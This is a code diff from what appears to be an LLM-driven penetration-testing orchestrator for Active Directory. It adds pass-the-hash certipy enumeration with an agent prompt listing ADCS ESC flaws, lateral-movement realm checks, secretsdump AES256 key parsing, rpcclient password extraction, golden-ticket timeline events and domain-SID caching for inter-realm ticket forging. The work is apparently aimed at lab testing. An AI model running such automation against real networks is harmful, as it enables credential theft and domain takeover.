to dispatch when the credential's realm differs from the target + /// host's realm and no trust path is known — wrong-realm NTLM/Kerberos auth + /// against a foreign DC just returns ACCESS_DENIED and burns LLM tokens + /// (see the swarm of NORTH\catelyn → braavos.essos.local failures). pub async fn request_lateral( &self, target_ip: &str, credential: &ares_core::models::Credential, technique: &str, ) -> Result> { + // Stable key shared with the cross-realm guard below so a rejection + // permanently suppresses retries from credential_expansion and the LLM. + let cross_realm_key = format!( + "{}|{}|{}|{}", + credential.domain.to_lowercase(), + credential.username.to_lowercase(), + target_ip, + technique + ); + + { + let state = self.state.read().await; + if state.is_processed(DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) { + debug!( + target_ip = target_ip, + cred_user = %credential.username, + technique = technique, + "Skipping lateral — already rejected as cross-realm dead-end" + ); + return Ok(None); + } + } + + // Resolve target's realm from state.hosts (FQDN suffix). + let target_domain = { + let state = self.state.read().await; + state + .hosts + .iter() + .find(|h| h.ip == target_ip) + .and_then(|h| h.hostname.split_once('.').map(|(_, d)| d.to_lowercase())) + }; + if let Some(td) = target_domain { + let cd = credential.domain.to_lowercase(); + if !cd.is_empty() + && cd != td + && !td.ends_with(&format!(".{cd}")) + && !cd.ends_with(&format!(".{td}")) + { + tracing::warn!( + target_ip = %target_ip, + target_domain = %td, + cred_domain = %cd, + cred_user = %credential.username, + technique = %technique, + "Refusing cross-realm lateral movement — use forest_trust_escalation or get a same-realm credential first" + ); + { + let mut state = self.state.write().await; + state.mark_processed(DEDUP_CROSS_REALM_LATERAL, cross_realm_key.clone()); + } + let _ = self + .state + .persist_dedup(&self.queue, DEDUP_CROSS_REALM_LATERAL, &cross_realm_key) + .await; + return Ok(None); + } + } let payload = json!({ "technique": technique, "target_ip": target_ip, @@ -429,23 +492,78 @@ impl Dispatcher { } /// Submit a CERTIPY find task for ADCS enumeration. + /// + /// `ntlm_hash` and `hash_username` enable pass-the-hash authentication when + /// no cleartext credential is available for the target domain. pub async fn request_certipy_find( &self, target_ip: &str, domain: &str, credential: &ares_core::models::Credential, + ntlm_hash: Option<&str>, + hash_username: Option<&str>, + ca_host_ip: Option<&str>, ) -> Result> { - let payload = json!({ + // When PTH hash is available, use the hash user's identity for the target domain + let (cred_user, cred_pass, cred_domain) = if let Some(_hash) = ntlm_hash { + let user = hash_username.unwrap_or(&credential.username); + (user.to_string(), String::new(), domain.to_string()) + } else { + ( + credential.username.clone(), + credential.password.clone(), + credential.domain.clone(), + ) + }; + + let mut payload = json!({ "technique": "certipy_find", "target_ip": target_ip, "domain": domain, "credential": { - "username": credential.username, - "password": credential.password, - "domain": credential.domain, + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, }, + "instructions": concat!( + "Run the certipy_find tool with vulnerable=true to enumerate vulnerable ", + "certificate templates and CAs.\n\n", + "IMPORTANT: You MUST pass vulnerable=true to certipy_find. Without it, the ", + "output will not flag ESC vulnerabilities and no vulns will be registered.\n\n", + "AUTHENTICATION: If password is empty and an NTLM hash is provided, use the ", + "certipy_find tool with the 'hashes' parameter (format ':nthash'). Do NOT pass ", + "an empty password.\n\n", + "If a password IS provided, use certipy_find with 'password' parameter.\n\n", + "For each vulnerable template found, register a vulnerability with:\n", + " vuln_type: the ESC type (e.g. 'esc1', 'esc2', 'esc3', 'esc4', 'esc6', 'esc8', 'esc10', 'esc11', 'esc15')\n", + " target: the certificate template name\n", + " target_ip: the CA server IP\n", + " domain: the domain\n", + " details: include template_name, ca_name, enrollee_supplies_subject, ", + "client_authentication, any_purpose, enrollment_rights, and which users/groups can enroll\n\n", + "Check for: ESC1 (Enrollee Supplies Subject + Client Auth), ESC2 (Any Purpose EKU), ", + "ESC3 (enrollment agent), ESC4 (template ACL abuse), ESC6 (EDITF flag), ", + "ESC7 (ManageCA), ESC8 (Web Enrollment HTTP relay), ESC9 (UPN Spoofing), ", + "ESC10 (Weak Certificate Mapping / StrongCertificateBindingEnforcement=0), ", + "ESC11 (RPC enrollment relay / IF_ENFORCEENCRYPTICERTREQUEST disabled), ", + "ESC13 (Issuance Policy), ESC15 (Application Policy OID / CVE-2024-49019).\n", + "If certipy_find fails, try with -stdout flag." + ), }); - self.throttled_submit("recon", "recon", payload, 4).await + // Attach hash for PTH authentication + if let Some(hash) = ntlm_hash { + payload["ntlm_hash"] = json!(hash); + if let Some(user) = hash_username { + payload["hash_username"] = json!(user); + } + } + // CA host IP for parser to set correct vuln target + if let Some(ca_ip) = ca_host_ip { + payload["ca_host_ip"] = json!(ca_ip); + } + // task_type "recon" → recon prompt template (supports instructions/ntlm_hash) + // target_role "privesc" → privesc tools (certipy_find is only in privesc) + self.throttled_submit("recon", "privesc", payload, 4).await } /// Refresh the operation lock TTL. Called periodically. diff --git a/ares-cli/src/orchestrator/exploitation.rs b/ares-cli/src/orchestrator/exploitation.rs index 2e3ce418..24a570cf 100644 --- a/ares-cli/src/orchestrator/exploitation.rs +++ b/ares-cli/src/orchestrator/exploitation.rs @@ -16,6 +16,7 @@ use tracing::{debug, info, warn}; use ares_core::models::VulnerabilityInfo; +use crate::orchestrator::automation::EXPLOITABLE_ESC_TYPES; use crate::orchestrator::dispatcher::Dispatcher; /// Cooldown before re-dispatching a failed exploit for the same vulnerability. @@ -67,10 +68,18 @@ pub async fn exploitation_workflow( // Try to pop the highest-priority vuln from the ZSET match pop_next_vuln(&dispatcher).await { Ok(Some(vuln)) => { - // Skip delegation vulns — s4u.rs handles these with proper - // credential checking and lockout-aware dispatch. The generic - // exploitation path falls back to wrong credentials and - // produces LLM errors with missing target_spn. + // Skip vulns owned by dedicated automation modules — the + // generic exploitation path picks the wrong worker role and + // falls back to wrong credentials, producing LLM errors: + // - delegation (constrained/unconstrained/rbcd) is handled + // by s4u.rs with credential checking and lockout-aware + // dispatch. + // - ADCS ESC types are handled by auto_adcs_exploitation, + // which routes each ESC variant to the correct role + // (e.g. coercion for ESC8/ESC11, privesc for ESC1/ESC4) + // via role_for_esc_type. Dropping them from the ZSET is + // safe because that automation reads from + // state.discovered_vulnerabilities, not the ZSET. { let vtype = vuln.vuln_type.to_lowercase(); if vtype == "constrained_delegation" @@ -84,6 +93,28 @@ pub async fn exploitation_workflow( ); continue; } + if EXPLOITABLE_ESC_TYPES.contains(&vtype.as_str()) { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + "Skipping ADCS ESC vuln (handled by auto_adcs_exploitation)" + ); + continue; + } + // child_to_parent and forest_trust_escalation are handled by + // auto_trust_follow (trust.rs) via direct dispatch_tool calls + // to raise_child / create_inter_realm_ticket. The generic + // exploit dispatcher hands these off to a generic LLM agent + // that lacks the orchestrator-resolved SIDs and trust keys, + // so it requests assistance and burns budget. + if vtype == "child_to_parent" || vtype == "forest_trust_escalation" { + debug!( + vuln_id = %vuln.vuln_id, + vuln_type = %vuln.vuln_type, + "Skipping trust vuln (handled by auto_trust_follow)" + ); + continue; + } } // Check strategy technique filter — skip vulns blocked by diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs index 003bd7af..f1f134ba 100644 --- a/ares-cli/src/orchestrator/mod.rs +++ b/ares-cli/src/orchestrator/mod.rs @@ -153,43 +153,75 @@ async fn run_inner() -> Result<()> { // Seed domain_controllers from target IPs so automation tasks // (AS-REP roast, Kerberoast, BloodHound, delegation enum) can fire // immediately without waiting for recon to report back. - // Probe port 88 (Kerberos) to find a real DC, don't blindly use first IP. + // + // Probe ALL target IPs on port 88/389 to find every DC, then query + // each DC's LDAP rootDSE (`defaultNamingContext`) to discover which + // domain it serves. This eliminates the race condition where + // automation tasks fire before recon discovers child-domain DCs + // (e.g. child.contoso.local at 192.168.58.11 vs the parent + // contoso.local at 192.168.58.10). if state.domain_controllers.is_empty() { - let dc_ip = bootstrap::probe_dc_port(&config.target_ips).await; - if let Some(ref ip) = dc_ip { + let dc_map = bootstrap::discover_dc_domains(&config.target_ips, &domain).await; + + if !dc_map.is_empty() { let dc_key = format!( "{}:{}:{}", ares_core::state::KEY_PREFIX, state.operation_id, ares_core::state::KEY_DC_MAP, ); + let domain_key = format!("ares:op:{}:domains", state.operation_id); let mut conn = queue.connection(); + + for (dc_domain, dc_ip) in &dc_map { + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &dc_key, dc_domain, dc_ip).await; + state + .domain_controllers + .insert(dc_domain.clone(), dc_ip.clone()); + + // Add discovered domains to the domains list so automation + // tasks can enumerate them (AS-REP roast, BloodHound, etc.) + if !state.domains.contains(dc_domain) { + state.domains.push(dc_domain.clone()); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, dc_domain).await; + } + + info!( + domain = %dc_domain, + dc_ip = %dc_ip, + "Seeded domain controller from bootstrap DC discovery" + ); + } + let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &domain, ip).await; - state.domain_controllers.insert(domain.clone(), ip.clone()); - info!( - domain = %domain, - dc_ip = %ip, - "Seeded domain controller from target IPs (port 88 probe)" - ); + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; - // Also register the credential's domain (may differ from target_domain, - // e.g., child.contoso.local vs contoso.local). - // This ensures automation tasks (spray, kerberoast) can find a DC - // for the credential's domain. + // Also register the credential's domain if not already mapped. + // The credential domain may differ from any discovered DC domain + // (e.g. if the credential is for a domain whose DC is behind a + // firewall and didn't respond to probes). if let Some(ref cred) = config.initial_credential { let cred_domain = cred.domain.to_lowercase(); - if cred_domain != domain && !cred_domain.is_empty() { - let _: Result<(), _> = - redis::AsyncCommands::hset(&mut conn, &dc_key, &cred_domain, ip) - .await; + if !cred_domain.is_empty() + && !state.domain_controllers.contains_key(&cred_domain) + { + // Use the first discovered DC as fallback for the + // credential's domain — better than no mapping at all. + let fallback_ip = &dc_map[0].1; + let _: Result<(), _> = redis::AsyncCommands::hset( + &mut conn, + &dc_key, + &cred_domain, + fallback_ip, + ) + .await; state .domain_controllers - .insert(cred_domain.clone(), ip.clone()); - // Also add this domain to the domains set + .insert(cred_domain.clone(), fallback_ip.clone()); if !state.domains.contains(&cred_domain) { state.domains.push(cred_domain.clone()); - let domain_key = format!("ares:op:{}:domains", state.operation_id); let _: Result<(), _> = redis::AsyncCommands::sadd( &mut conn, &domain_key, @@ -199,8 +231,8 @@ async fn run_inner() -> Result<()> { } info!( cred_domain = %cred_domain, - dc_ip = %ip, - "Also registered credential domain in DC map" + dc_ip = %fallback_ip, + "Registered credential domain with fallback DC" ); } } diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs index 2979d432..0c06419e 100644 --- a/ares-cli/src/orchestrator/output_extraction/hashes.rs +++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs @@ -29,10 +29,30 @@ static RE_NTLM_PARTIAL: LazyLock = static RE_NTLM_CONTINUATION: LazyLock = LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap()); +// AES256 trust/account key from secretsdump: +// DOMAIN\\user:aes256-cts-hmac-sha1-96: +// domain.local/user:aes256-cts-hmac-sha1-96: +// user:aes256-cts-hmac-sha1-96: +static RE_AES256_KEY: LazyLock = LazyLock::new(|| { + Regex::new(r"(?:[^\\/\s:]+[\\/])?([^:\s\\/]+):aes256-cts-hmac-sha1-96:([a-fA-F0-9]+)").unwrap() +}); + pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { let mut hashes = Vec::new(); let mut seen = std::collections::HashSet::new(); + // Pre-scan for AES256 keys; these are emitted on separate lines from the + // NTLM hash by impacket-secretsdump. Win2016+ DCs reject RC4-only + // inter-realm tickets (KDC_ERR_TGT_REVOKED), so we attach the AES256 key + // to the matching Hash entry by username. + let mut aes_by_user: std::collections::HashMap = + std::collections::HashMap::new(); + for caps in RE_AES256_KEY.captures_iter(output) { + let user = caps.get(1).unwrap().as_str().to_lowercase(); + let aes = caps.get(2).unwrap().as_str().to_lowercase(); + aes_by_user.insert(user, aes); + } + // First pass: unwrap line-wrapped NTLM hashes let lines: Vec<&str> = output.lines().collect(); let mut unwrapped: Vec = Vec::new(); @@ -72,7 +92,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -100,7 +120,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -126,7 +146,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } continue; @@ -155,7 +175,7 @@ pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { discovered_at: Some(chrono::Utc::now()), parent_id: None, attack_step: 0, - aes_key: None, + aes_key: aes_by_user.get(&username.to_lowercase()).cloned(), }); } } @@ -362,6 +382,20 @@ mod tests { assert!(extract_hashes("", "CONTOSO").is_empty()); } + #[test] + fn extract_hashes_attaches_aes256_to_trust_account() { + let output = "\ +FABRIKAM\\CONTOSO$:1107:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333::: +FABRIKAM\\CONTOSO$:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444"; + let hashes = extract_hashes(output, "fabrikam.local"); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0].username, "CONTOSO$"); + assert_eq!( + hashes[0].aes_key.as_deref(), + Some("4444444444444444444444444444444444444444444444444444444444444444") + ); + } + #[test] fn extract_cracked_passwords_hashcat_tgs() { let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$aabb$ccdd:Summer2024!"; diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs index f61053dc..f20fd7b6 100644 --- a/ares-cli/src/orchestrator/output_extraction/hosts.rs +++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs @@ -56,9 +56,23 @@ pub fn extract_hosts(output: &str) -> Vec { .map(|c| c.get(1).unwrap().as_str().trim().to_string()) .unwrap_or_default(); + // Synthesize FQDN as `.`, but reject workgroup-only + // hosts where impacket reports the machine's NetBIOS name as the + // first label of the "domain" field (e.g. + // `(name:WIN-X) (domain:WIN-X.GXM0.LOCAL)` from a non-domain-joined + // Windows box). Without this guard we synthesize + // `win-x.win-x.gxm0.local` and `publish_host` then extracts the + // junk suffix `win-x.gxm0.local` into `state.domains`. let hostname = if !netbios_name.is_empty() && !domain.is_empty() && !netbios_name.contains('.') { - format!("{}.{}", netbios_name.to_lowercase(), domain.to_lowercase()) + let nb = netbios_name.to_lowercase(); + let dom = domain.to_lowercase(); + let workgroup_self = dom == nb || dom.starts_with(&format!("{}.", nb)); + if workgroup_self { + netbios_name + } else { + format!("{nb}.{dom}") + } } else { netbios_name }; @@ -162,6 +176,20 @@ SMB 192.168.58.10 445 DC01 [*] Windows Server (name:DC01) (domain:contoso.l assert!(extract_hosts("").is_empty()); } + #[test] + fn extract_workgroup_self_domain_does_not_duplicate_netbios() { + // Workgroup-only Windows hosts often report their own NetBIOS name as + // the first label of the SMB "domain" field. We must NOT synthesize + // `win-x.win-x.gxm0.local`; use the bare NetBIOS name instead so the + // junk suffix never reaches `state.domains`. + let output = "SMB 192.168.58.30 445 WIN-E4G4GC587O4 [*] Windows Server 2003 \ + (name:WIN-E4G4GC587O4) (domain:WIN-E4G4GC587O4.GXM0.LOCAL) (signing:False)"; + let hosts = extract_hosts(output); + assert_eq!(hosts.len(), 1); + assert_eq!(hosts[0].hostname, "WIN-E4G4GC587O4"); + assert!(!hosts[0].hostname.contains('.')); + } + #[test] fn extract_multiple_hosts() { let output = "\ diff --git a/ares-cli/src/orchestrator/output_extraction/passwords.rs b/ares-cli/src/orchestrator/output_extraction/passwords.rs index 2d06a50a..12386af7 100644 --- a/ares-cli/src/orchestrator/output_extraction/passwords.rs +++ b/ares-cli/src/orchestrator/output_extraction/passwords.rs @@ -31,10 +31,78 @@ static RE_NETEXEC_SUCCESS: LazyLock = LazyLock::new(|| { Regex::new(r"\[\+\]\s+([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+):([^\s(]+)").unwrap() }); +/// Regex for rpcclient `queryuser` output: `User Name :\tjdoe` +static RE_RPC_USER_NAME: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^\s*User\s+Name\s*:\s*(\S+)").unwrap()); + +/// Extract credentials from rpcclient queryuser blocks where "User Name" and +/// "Description" (containing a password) appear on separate lines. +/// +/// This is safe because rpcclient queryuser output is deterministic: attributes +/// always belong to the same user within a single query response block. +fn extract_rpcclient_description_passwords( + output: &str, + default_domain: &str, + seen: &mut std::collections::HashSet, +) -> Vec { + let mut credentials = Vec::new(); + let mut current_user: Option = None; + + for line in output.lines() { + let stripped = line.trim(); + // Track the current user from "User Name : xxx" + if let Some(caps) = RE_RPC_USER_NAME.captures(stripped) { + current_user = Some(caps.get(1).unwrap().as_str().to_string()); + continue; + } + // Empty line or new block separator resets user context + if stripped.is_empty() { + current_user = None; + continue; + } + // Look for password in Description field + if let Some(ref username) = current_user { + if stripped.to_lowercase().contains("description") + && stripped.to_lowercase().contains("password") + { + if let Some(caps) = RE_PASSWORD_VALUE.captures(stripped) { + let password = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches(|c: char| ".,;:()".contains(c)) + .trim_matches('\'') + .trim_matches('"') + .to_string(); + if is_valid_credential(username, &password) { + let key = format!("{}\\{}:{}", default_domain, username, password); + if seen.insert(key) { + credentials.push(make_credential( + username, + &password, + default_domain, + "description_field", + )); + } + } + } + } + } + } + credentials +} + pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec { let mut credentials = Vec::new(); let mut seen = std::collections::HashSet::new(); + // First pass: extract from rpcclient queryuser blocks (multi-line) + credentials.extend(extract_rpcclient_description_passwords( + output, + default_domain, + &mut seen, + )); + const FAILURE_MARKERS: &[&str] = &[ "STATUS_LOGON_FAILURE", "STATUS_PASSWORD_EXPIRED", @@ -118,10 +186,18 @@ pub fn extract_plaintext_passwords(output: &str, default_domain: &str) -> Vec = LazyLock::new(|| { Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() }); +/// Check if a domain string looks like a machine hostname rather than an AD domain. +/// +/// Machine FQDNs like `win-g7fpa5zzxzv.w5an.local` or NetBIOS machine names like +/// `WIN-G7FPA5ZZXZV` pollute domain tracking when they appear in SMB banners or +/// UPN suffixes (e.g., null session enum on a DC reports the Kali box's own domain). +pub fn is_machine_hostname_domain(domain: &str) -> bool { + let first_label = domain.split('.').next().unwrap_or(domain); + let lower = first_label.to_lowercase(); + // Windows auto-generated hostnames: WIN-XXXXXXXX, DESKTOP-XXXXXXX + if lower.starts_with("win-") || lower.starts_with("desktop-") { + return true; + } + false +} + /// Reject garbage usernames and invalid domains from regex extraction. pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { if username.is_empty() || username.ends_with('$') { @@ -83,12 +98,17 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { let stripped = line.trim(); if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps + let captured = caps .get(1) .unwrap() .as_str() .trim_end_matches('.') .to_string(); + // Don't let machine hostnames (e.g. from Kali's own SMB banner) + // override the task's default domain. + if !is_machine_hostname_domain(&captured) { + current_domain = captured; + } } let mut found = Vec::new(); @@ -102,7 +122,13 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { if let Some(caps) = RE_UPN.captures(stripped) { let user = caps.get(1).unwrap().as_str(); let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); + // If UPN suffix is a machine hostname (e.g. user@win-xxx.w5an.local), + // substitute the default domain to avoid storing garbage domains. + if is_machine_hostname_domain(dom) { + found.push((user.to_string(), default_domain.to_string())); + } else { + found.push((user.to_string(), dom.to_string())); + } } for caps in RE_USER_BRACKET.captures_iter(stripped) { @@ -216,4 +242,67 @@ mod tests { fn extract_users_empty_output() { assert!(extract_users("", "contoso.local").is_empty()); } + + // --- is_machine_hostname_domain --- + + #[test] + fn machine_hostname_win_prefix() { + assert!(is_machine_hostname_domain("WIN-G7FPA5ZZXZV")); + assert!(is_machine_hostname_domain("win-abc123")); + } + + #[test] + fn machine_hostname_win_fqdn() { + assert!(is_machine_hostname_domain("win-g7fpa5zzxzv.w5an.local")); + assert!(is_machine_hostname_domain("WIN-ABC123.contoso.local")); + } + + #[test] + fn machine_hostname_desktop_prefix() { + assert!(is_machine_hostname_domain("DESKTOP-ABC1234")); + assert!(is_machine_hostname_domain("desktop-xyz.corp.local")); + } + + #[test] + fn real_domain_not_machine_hostname() { + assert!(!is_machine_hostname_domain("contoso.local")); + assert!(!is_machine_hostname_domain("child.contoso.local")); + assert!(!is_machine_hostname_domain("CONTOSO")); + assert!(!is_machine_hostname_domain("CHILD")); + } + + // --- extract_users with machine hostname filtering --- + + #[test] + fn extract_users_smb_banner_machine_domain_ignored() { + // SMB banner with Kali machine domain should not override default_domain + let output = concat!( + "SMB 192.168.58.10 445 DC01 (domain:WIN-G7FPA5ZZXZV) ...\n", + "user:[jdoe] rid:[0x44e]\n", + ); + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + // Should use default_domain, not the machine hostname + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_upn_machine_domain_substituted() { + // UPN with machine FQDN should substitute default_domain + let output = "jdoe@win-g7fpa5zzxzv.w5an.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_real_upn_preserved() { + // Real UPN should keep its domain + let output = "jdoe@contoso.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].domain, "contoso.local"); + } } diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs index aae0e95b..6a6209dd 100644 --- a/ares-cli/src/orchestrator/result_processing/admin_checks.rs +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -7,7 +7,77 @@ use serde_json::Value; use tracing::{info, warn}; use super::parsing::has_domain_admin_indicator; +use super::timeline::{create_admin_upgrade_timeline_event, create_domain_admin_timeline_event}; use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Resolve a NetBIOS/flat domain name (e.g. `ESSOS`) to a known FQDN. +/// +/// Checks three sources, in order: +/// 1. `state.trusted_domains`: each `TrustInfo` carries an explicit `flat_name`. +/// 2. `state.netbios_to_fqdn`: published mappings from host short names; useful +/// when the flat name happens to match a hostname mapping. +/// 3. `state.domains`: derive each FQDN's first label and compare. Catches the +/// primary domain (which is rarely in `trusted_domains`). +/// +/// Returns `None` when the flat name does not correspond to any known domain. +/// Callers must treat that as "skip caching" — guessing risks attributing the +/// SID to the wrong domain. +fn resolve_flat_to_fqdn(flat: &str, state: &StateInner) -> Option { + let target = flat.to_uppercase(); + + if let Some(t) = state + .trusted_domains + .values() + .find(|t| !t.flat_name.is_empty() && t.flat_name.to_uppercase() == target) + { + return Some(t.domain.to_lowercase()); + } + + if let Some(fqdn) = state + .netbios_to_fqdn + .get(&target) + .or_else(|| state.netbios_to_fqdn.get(flat)) + { + // Only accept the mapping if it looks like a domain FQDN, not a host + // FQDN (e.g. "DC02" → "dc02.contoso.local" should NOT yield "dc02…"). + let lower = fqdn.to_lowercase(); + if is_valid_domain_fqdn(&lower) && state.domains.iter().any(|d| d.to_lowercase() == lower) { + return Some(lower); + } + } + + state + .domains + .iter() + .find(|d| { + d.split('.') + .next() + .map(|first| first.eq_ignore_ascii_case(flat)) + .unwrap_or(false) + }) + .map(|d| d.to_lowercase()) +} + +/// Validate that a string looks like a domain FQDN. +/// +/// Rejects empty strings, IP-like patterns, strings with whitespace, and strings +/// without at least one dot. Used to filter out malformed domain values that +/// occasionally appear in tool payloads (e.g. `"192.168.58.30 - dc01"`). +fn is_valid_domain_fqdn(s: &str) -> bool { + if s.is_empty() || s.contains(' ') || s.contains(':') || s.contains('/') { + return false; + } + if !s.contains('.') { + return false; + } + let first_label = s.split('.').next().unwrap_or(""); + if first_label.is_empty() || first_label.chars().all(|c| c.is_ascii_digit()) { + return false; + } + s.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') +} /// Determine the domain admin path from a payload. /// @@ -80,6 +150,12 @@ pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: & info!("Domain Admin achieved!"); } if !already_da { + // Emit Domain Admin timeline event + let da_domain = { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() + }; + create_domain_admin_timeline_event(dispatcher, &da_domain, path.as_deref()).await; let (domain, dc_target) = { let state = dispatcher.state.read().await; let domain = state.domains.first().cloned().unwrap_or_default(); @@ -183,6 +259,21 @@ pub(crate) async fn check_golden_ticket_completion( { warn!(err = %e, "Failed to set golden ticket flag"); } + + // Emit attack path timeline event for golden ticket + let techniques = vec!["T1558.001".to_string()]; + let event_id = format!("evt-gt-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "golden_ticket", + "description": format!("Golden ticket forged for domain {domain}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; } pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { @@ -214,6 +305,17 @@ pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: pwned_host = ?pwned_ip, "Credential upgraded to admin -- dispatching priority secretsdump" ); + // Mark the host as owned so automations (lsassy_dump, etc.) can fire + if let Some(ref ip) = pwned_ip { + if let Err(e) = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await + { + warn!(err = %e, ip = %ip, "Failed to mark host as owned"); + } + } + create_admin_upgrade_timeline_event(dispatcher, &username, &domain).await; let work: Vec<(String, ares_core::models::Credential)> = { let state = dispatcher.state.read().await; let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); @@ -280,72 +382,124 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A return; } let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { + + // Only cache when the output is genuine LSARPC SID-discovery output — i.e. + // it has either the impacket-lookupsid `[*] Domain SID is: …` header or + // the rpcclient `lsaquery` `Domain Name / Domain Sid` pair. Arbitrary recon + // output (LDAP group enumeration, BloodHound dumps, etc.) routinely contains + // foreign-security-principal SIDs that *look* like domain SIDs but are + // actually `-` entries from a different forest. Caching a + // regex-truncated FSP SID against the task's payload domain misforges + // every downstream golden / inter-realm ticket — caused op-20260429-164553 + // to forge a TGT for sevenkingdoms.local with a bogus ExtraSid that the + // parent KDC rejected with rpc_s_access_denied. + // + // lsaquery is the primary unauth path for cross-forest target SID discovery + // — it routinely succeeds against null sessions where impacket-lookupsid + // gets STATUS_ACCESS_DENIED. op-20260429-181500 discovered essos's SID via + // lsaquery but failed to cache it (only lookupsid was wired up), so the + // subsequent forge_inter_realm_and_dump fired with has_target_sid=false + // and produced no krbtgt extraction. + let lookupsid_sid = ares_core::parsing::LOOKUPSID_HEADER_RE + .captures(&combined) + .and_then(|c| c.get(1).map(|m| m.as_str().to_string())); + let lsaquery_pair = ares_core::parsing::extract_lsaquery_domain_sid(&combined); + let (sid, lsaquery_flat) = match (lookupsid_sid, lsaquery_pair) { + (Some(s), _) => (s, None), + (None, Some((flat, s))) => (s, Some(flat)), + (None, None) => return, + }; + + // Resolve the FQDN this SID belongs to. Anchor preference order: + // 1. Flat name parsed from the output — authoritative when present. For + // impacket-lookupsid we get it from the RID lines (e.g. `500: ESSOS\…`); + // for rpcclient lsaquery we get it from `Domain Name: ESSOS`. + // 2. Payload's `domain` field — used only when output has no flat name AND + // the field is a valid FQDN. The payload's domain is the *task* target, + // not necessarily the domain that produced the SID; trusting it blindly + // misattributed essos.local's SID to north.sevenkingdoms.local in + // op-20260429-112418. + // 3. State's primary domain — last resort, only when nothing else applies. + let parsed_flat = lsaquery_flat.or_else(|| { + ares_core::parsing::extract_domain_sid_and_flat_name(&combined).map(|(flat, _)| flat) + }); + let domain = { + let state = dispatcher.state.read().await; + if let Some(flat) = parsed_flat.as_deref() { + resolve_flat_to_fqdn(flat, &state).or_else(|| { + // Flat name parsed but unmapped — refuse to cache. Caching + // against the payload's domain here is exactly the bug we + // are trying to avoid. + warn!( + flat_name = %flat, + sid = %sid, + "Skipping SID cache: flat name does not match any known domain" + ); + None + }) + } else { + // No flat name in output. Fall back to payload domain or primary. + payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| is_valid_domain_fqdn(d)) + .or_else(|| state.domains.first().map(|d| d.to_lowercase())) + } + }; + let domain = match domain { + Some(d) => d, 